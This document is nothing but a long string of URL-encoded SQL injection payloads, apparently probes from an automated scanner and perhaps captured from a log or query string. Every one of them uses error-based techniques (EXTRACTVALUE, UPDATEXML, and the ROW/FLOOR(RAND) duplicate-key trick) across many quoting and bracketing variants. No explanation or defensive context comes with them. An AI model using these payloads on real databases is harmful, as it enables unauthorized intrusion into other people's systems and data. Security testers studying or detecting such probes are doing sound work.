foo%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%283642%3D3642 foo%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%288606%3D8606 foo%29%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%285123%3D5123 foo%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%27CLLU%27%3D%27CLLU foo%27%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%27WoDe%27%3D%27WoDe foo%27%29%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%27UqbV%27%3D%27UqbV foo%27%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%27JbSd%27%3D%27JbSd foo%27%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%27EByq%27%20LIKE%20%27EByq foo%27%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%27oGit%27%20LIKE%20%27oGit foo%27%29%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%27UZqj%27%20LIKE%20%27UZqj foo%27%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%27NTvN%27%20LIKE%20%27NTvN foo%22%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%22APIG%22%3D%22APIG foo%22%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%22jUKo%22%3D%22jUKo foo%22%29%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%22YmNP%22%3D%22YmNP foo%22%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%22tBZs%22%3D%22tBZs foo%22%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%22SCNa%22%20LIKE%20%22SCNa foo%22%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%22UmwD%22%20LIKE%20%22UmwD foo%22%29%29%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%22uIkv%22%20LIKE%20%22uIkv foo%22%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%22aUbl%22%20LIKE%20%22aUbl foo%29%20WHERE%204825%3D4825%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%29%20WHERE%202394%3D2394%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%20WHERE%202418%3D2418%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%22%20WHERE%202062%3D2062%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%20%7C%7C%20%28SELECT%202450%20FROM%20DUAL%20WHERE%204250%3D4250%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201076%20WHERE%205978%3D5978%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%209086%20FROM%20DUAL%20WHERE%203449%3D3449%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29 foo%20%2B%20%28SELECT%207031%20WHERE%206302%3D6302%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27RTDR%27%20FROM%20DUAL%20WHERE%206706%3D6706%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27wudy%27%20WHERE%204160%3D4160%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%282585%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282585%3D2585%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%23 foo%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%27%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%27%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%22%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%282091%3D2091 foo%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%289979%3D9979 foo%29%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%285217%3D5217 foo%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%27%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%27HWYL%27%3D%27HWYL foo%27%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%27VUbK%27%3D%27VUbK foo%27%29%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%28%27yWAi%27%3D%27yWAi foo%27%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%27flwN%27%3D%27flwN foo%27%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%27BDpe%27%20LIKE%20%27BDpe foo%27%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%27bvlW%27%20LIKE%20%27bvlW foo%27%29%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%28%27jrpe%27%20LIKE%20%27jrpe foo%27%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%27fuJO%27%20LIKE%20%27fuJO foo%22%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%22lSYZ%22%3D%22lSYZ foo%22%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%22nave%22%3D%22nave foo%22%29%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%28%22RIWs%22%3D%22RIWs foo%22%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%22fDxf%22%3D%22fDxf foo%22%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%22fvPa%22%20LIKE%20%22fvPa foo%22%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%22DiqU%22%20LIKE%20%22DiqU foo%22%29%29%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%28%28%28%22JYFG%22%20LIKE%20%22JYFG foo%22%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20AND%20%22HTEb%22%20LIKE%20%22HTEb foo%29%20WHERE%208263%3D8263%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%27%29%20WHERE%204106%3D4106%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%27%20WHERE%207347%3D7347%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%22%20WHERE%208508%3D8508%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29 foo%27%20%7C%7C%20%28SELECT%204856%20FROM%20DUAL%20WHERE%203204%3D3204%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%207771%20WHERE%209277%3D9277%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%205812%20FROM%20DUAL%20WHERE%206996%3D6996%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20%29 foo%20%2B%20%28SELECT%203791%20WHERE%203267%3D3267%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20%29 foo%27%20%2B%20%28SELECT%20%27kqXO%27%20FROM%20DUAL%20WHERE%206274%3D6274%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27gBcw%27%20WHERE%202836%3D2836%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20OR%20UPDATEXML%281335%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281335%3D1335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2148%29%20%23 -7776%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -2484%27%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -5319%27%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -7609%22%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -8617%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%284460%3D4460 -7397%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%283443%3D3443 -3931%29%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%286099%3D6099 -8803%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -8842%27%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27ZaLm%27%3D%27ZaLm -8147%27%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27rOGs%27%3D%27rOGs -2738%27%29%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27UWtR%27%3D%27UWtR -1601%27%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27XyyR%27%3D%27XyyR -3390%27%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27qGOV%27%20LIKE%20%27qGOV -4374%27%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27PcYK%27%20LIKE%20%27PcYK -7309%27%29%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27NUIW%27%20LIKE%20%27NUIW -7212%27%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27Jzqo%27%20LIKE%20%27Jzqo -1490%22%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22bhGJ%22%3D%22bhGJ -3814%22%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22NCda%22%3D%22NCda -6305%22%29%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22lCkw%22%3D%22lCkw -7905%22%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22EKDe%22%3D%22EKDe -9736%22%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22dxPl%22%20LIKE%20%22dxPl -2353%22%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22boOK%22%20LIKE%20%22boOK 